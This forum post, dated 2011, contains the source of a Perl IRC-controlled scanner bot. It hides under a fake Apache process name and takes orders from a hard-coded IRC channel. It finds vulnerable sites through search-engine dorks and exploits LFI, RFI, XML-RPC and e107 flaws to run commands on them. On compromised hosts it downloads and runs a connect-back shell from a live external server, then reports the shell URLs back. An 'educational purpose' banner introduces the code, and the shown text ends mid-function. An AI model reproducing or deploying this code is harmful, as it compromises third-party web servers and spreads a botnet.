Guest vini4p Posted January 3, 2011 Report Share Posted January 3, 2011 #!/usr/bin/perl$powered="BaMbY";$mail="admin(at)bamby.web.id"; ##################################################################################### ## ## ## 17/06/2010 ## ## Author : BaMbY, Voo_Doo ## ## Team : Irc.Byroe.Net ## ## ## ## ## IMPORTANT ## ## ## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ## ## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ## ## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ## ## # SYSTEM MORE SECURE. ## ## ## ## ## ## ## Features: ## ## [+]e107 Injection Scanner ## ## [+]Sql Injection Scanner ## ## [+]XML (Extensible Markup Language) Injection Scanner ## ## [+]Remote File Inclusion Scanner ## ## [+]Local File Inclusion Scanner ## ## [+]Integrated Shell, so you can execute commands on the server ## ## [+]Spread Mode, to activate or disable Spread Function ## ## ## #####################################################################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use IO::Socket::INET;use Socket;use HTTP::Request::Common;use LWP::Simple;use LWP 5.64;use HTTP::Request::Common qw(POST);use Digest::MD5 qw(md5_hex);use MIME::Base64;my $fakeproc = "/usr/sbin/apache2 -k start"; $ircserver = "190.144.86.244";my $ircport = "6667";my $nickname = "admin";my $ident = "admin";my $channel = "#kid";my $runner = "a";my $fullname = 'New Private Scanner RoIRC';my $lfi = "!lfi";my $xml = "!xml";my $e107 = "!e107";my $sql = "!sql";my $rfi = "!rfi";my $cmdlfi = "!cmdlfi";my $cmde107 = "!cmde107";my $cmdxml = "!cmdxml";my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ%00";my $rfiid = "http://solid.go.ro/poze/myid.jpg?";my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');$SIG{'INT'} = 'IGNORE';$SIG{'HUP'} = 'IGNORE';$SIG{'TERM'} = 'IGNORE';$SIG{'CHLD'} = 'IGNORE';$SIG{'PS'} = 'IGNORE';chdir("/tmp");$ircserver="$ARGV[0]" if $ARGV[0];$0 = "$fakeproc"."\0"x16;;&SIGN();my $pid = fork;exit if $pid;die "\n [!] Something Wrong !!!: $!" unless defined($pid);our %irc_servers;our %DCC;my $dcc_sel = new IO::Select->new();$sel_client = IO::Select->new();sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; }}sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; }}sub parse { my $servarg = shift; if ($servarg =~ /^PING \.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?)\s+NICK\s+\\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\.+?)\s+433/i) { nick("$mynick|".int rand(9999)); } elsif ($servarg =~ m/^\.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $nickname +Bx"); sendraw("JOIN $channel"); sendraw("PRIVMSG $channel :Hello, I`m Ready To Scanner"); sendraw("PRIVMSG $runner :Hi $runner im here !!!"); }}my $line_temp;while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//; if ($msg=~ /PRIVMSG $channel :!help/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 ################## Vuln Scanner ###################"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 # ( $rfi/$lfi/$sql/$xml ) [bug] [dork] #"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 ################### RCE Command ###################"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 # $e107 [dork] #"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 ################# Execute Command #################"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 # ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] #"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 ################### md5 Command ###################"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 # !dec / !enc #"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 #################### BOT Info #####################"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 # !respon | !engine | !pid | !version | !about #"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Help3) 7 ###################################################"); } if ($msg=~ /PRIVMSG $channel :!version/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Version3)7 Multi Scanner v2"); } if ($msg=~ /PRIVMSG $channel :!engine/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Engine3)7 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo."); } if ($msg=~ /PRIVMSG $channel :!pid/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3PID3)7 Process/ID : 4 $fakeproc - $$"); } if ($msg=~ /PRIVMSG $channel :!about/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3About3)5 Multi Scanner v1"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3About3)5 Coded by Poko "); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3About3)5 Copyright © 2010 RoIRC"); } ##################################################################### CMD IRC if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){ my $enc = $1; &enc($enc); } if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){ my $dec = $1; &dec($dec); } if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){ my $cnls = $1; &join($cnls); } if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){ my $cnls = $1; ?($cnls); } if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){ my $cnls = $1; &quit($cnls); } if ($msg=~ /PRIVMSG $channel :!respon/){ my $re = query($rfiid); if ( $re =~ /ByroeNet/ ) { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Info3)3 Response is working !"); } else { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3Info3)4 Response is 4NOT4 working !"); } } ##################################################################### CMD LFI if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){ my $url = $1."../../../../../../../../../../../../../../../proc/self/environ%00"; my $cmd = $2; &cmdlfi($url,$cmd); } ##################################################################### ##################### LFI LFI LFI ################### ##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)7 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)7 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)7 Search Engine Loading ..."); &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################### XML XML XML ################### ##################################################################### if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmdxml($url,$cmd); } ##################################################################### GooGle Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XML3)7 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XML3)7 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XML3)7 Search Engine Loading ..."); &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &xmlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################### RFI RFI RFI ################### ##################################################################### GooGle Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3RFI3)7 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3RFI3)7 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3RFI3)7 Search Engine Loading ..."); &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################### SQL SQL SQL ################### ##################################################################### GooGle Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)7 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)7 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)7 Search Engine Loading ..."); &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################### e107 e107 e107 ################### ##################################################################### GooGle Engine if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmde107($url,$cmd); } if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = "/contact.php"; my $d0rk = $1; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e1073)7 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e1073)7 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e1073)7 Search Engine Loading ..."); &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = "/contact.php"; my $d0rk = $1; &e107scan($engx,$bugx,$d0rk); } exit; } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } }}##################################################################### Proceduresub cmdlfi() {my $browser = LWP::UserAgent->new;my $url = $_[0];my $cmd = $_[1];my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";$browser->agent("$hie");$browser->timeout(3);$response = $browser->get( $url );if ($response->content =~ /j13mbut(.*)j13mbut/s) {print $1;sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFICMD3)4 $1");}}sub lfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @lfigoogle=&google($dork); push(@lfitotal, @lfigoogle); } if ($engz =~ /AllTheWeb/) { my @lfialltheweb=&alltheweb($dork); push(@lfitotal, @lfialltheweb); } if ($engz =~ /Bing/) { my @lfiBing=&Bing($dork); push(@lfitotal, @lfiBing); } if ($engz =~ /ALtaViSTa/) { my @lfialtavista=&altavista($dork); push(@lfitotal, @lfialtavista); } if ($engz =~ /AsK/) { my @lfiask=&ask($dork); push(@lfitotal, @lfiask); } if ($engz =~ /UoL/) { my @lfiuol=&uol($dork); push(@lfitotal, @lfiuol); } if ($engz =~ /YahOo/) { my @lfiyahoo=&yahoo($dork); push(@lfitotal, @lfiyahoo); } my @lficlean = &calculate(@lfitotal); if (scalar(@clean) != 0) { } my $uni=scalar(@lficlean); foreach my $lfitarget (@lficlean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)(4@3$engz3)7 Scan Finish for7 $dork"); } my $lfi = "../../../../../../../../../../../../../../.."; my $xpl = "http://".$lfitarget.$bugz.$rspo_test; my $vuln = "http://".$lfitarget."12".$bugz."7".$rspo_test.""; my $re = getcontent($xpl); if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id"); $rspo =~ s/\n//g; if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) { my ($sys,$uid) = ($1,$2); my $lfispread = "cd /tmp;lwp-download http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121;wget http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121"; my $tmp = "/tmp/cmd".int rand(2010); my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread"); sleep(1); my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%00'); if ($res =~ /BaMbY/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)(4@3$engz3)3(13@12PHPSheLL3)4 http://".$lfitarget."12".$bugz."6".$lfi."7".$tmp."%00 3(7@3".$sys."3)"); sendraw($IRC_cur_socket, "PRIVMSG BaMbY :3(4@3LFI3)(4@3$engz3)3(13@12PHPSheLL3)4 http://".$lfitarget."12".$bugz."6".$lfi."7".$tmp."%00 3(7@3".$sys."3)"); } else { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3LFI3)(4@3$engz3)3(13@12System3)4 http://".$lfitarget."12".$bugz."6[LFI] 3(7@3".$sys." 7uid=".$uid."3)"); sendraw($IRC_cur_socket, "PRIVMSG BaMbY :3(4@3LFI3)(4@3$engz3)3(13@12System3)4 http://".$lfitarget."12".$bugz."6[LFI] 3(7@3".$sys." 7uid=".$uid."3)"); } } else { } } exit } sleep(3); } }}sub cmdxml() {my $jed = $_[0];my $dwa = $_[1];my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value></param></params></methodCall>";my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);if ($response->content =~ /bamby(.*)solo/s) {sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XMLCMD3)4 $1");}}sub xmlscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @xmlgoogle=&google($dork); push(@xmltotal, @xmlgoogle); } if ($engz =~ /AllTheWeb/) { my @xmlalltheweb=&alltheweb($dork); push(@xmltotal, @xmlalltheweb); } if ($engz =~ /Bing/) { my @xmlBing=&Bing($dork); push(@xmltotal, @xmlBing); } if ($engz =~ /ALtaViSTa/) { my @xmlaltavista=&altavista($dork); push(@xmltotal, @xmlaltavista); } if ($engz =~ /AsK/) { my @xmlask=&ask($dork); push(@xmltotal, @xmlask); } if ($engz =~ /UoL/) { my @xmluol=&uol($dork); push(@xmltotal, @xmluol); } if ($engz =~ /YahOo/) { my @xmlyahoo=&yahoo($dork); push(@xmltotal, @xmlyahoo); } my @xmlclean = &calculate(@xmltotal); if (scalar(@xmlclean) != 0) { } my $uni=scalar(@xmlclean); foreach my $xmltarget (@xmlclean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XML3)(4@3$engz3)7 Scan Finish for7 $dork"); } my $xpl = "http://".$xmltarget.$bugz; my $xmlsprd = "cd /tmp;lwp-download http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121;wget http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121"; my $strona = getcontent($xpl); if ( $strona =~ /faultCode/ ) { xmlcek($xpl); xmlxspread($xpl,$xmlsprd); } }}sub rfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @rfigoogle=&google($dork); push(@rfitotal, @rfigoogle); } if ($engz =~ /AllTheWeb/) { my @rfialltheweb=&alltheweb($dork); push(@rfitotal, @rfialltheweb); } if ($engz =~ /Bing/) { my @rfiBing=&Bing($dork); push(@rfitotal, @rfiBing); } if ($engz =~ /ALtaViSTa/) { my @rfialtavista=&altavista($dork); push(@rfitotal, @rfialtavista); } if ($engz =~ /AsK/) { my @rfiask=&ask($dork); push(@rfitotal, @rfiask); } if ($engz =~ /UoL/) { my @rfiuol=&uol($dork); push(@rfitotal, @rfiuol); } if ($engz =~ /YahOo/) { my @rfiyahoo=&yahoo($dork); push(@rfitotal, @rfiyahoo); } my @rficlean = &calculate(@rfitotal); if (scalar(@rficlean) != 0) { } my $uni=scalar(@rficlean); foreach my $rfitarget (@rficlean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3RFI3)(4@3$engz3)7 Scan Finish for7 $dork"); } my $rfixpl = "http://".$rfitarget.$bugz.$rfiid; my $inj = "http://".$rfitarget."12".$bugz."7[PHP-SHELL]?"; my $re = getcontent($rfixpl); if ($re =~ /BaMbY/){ 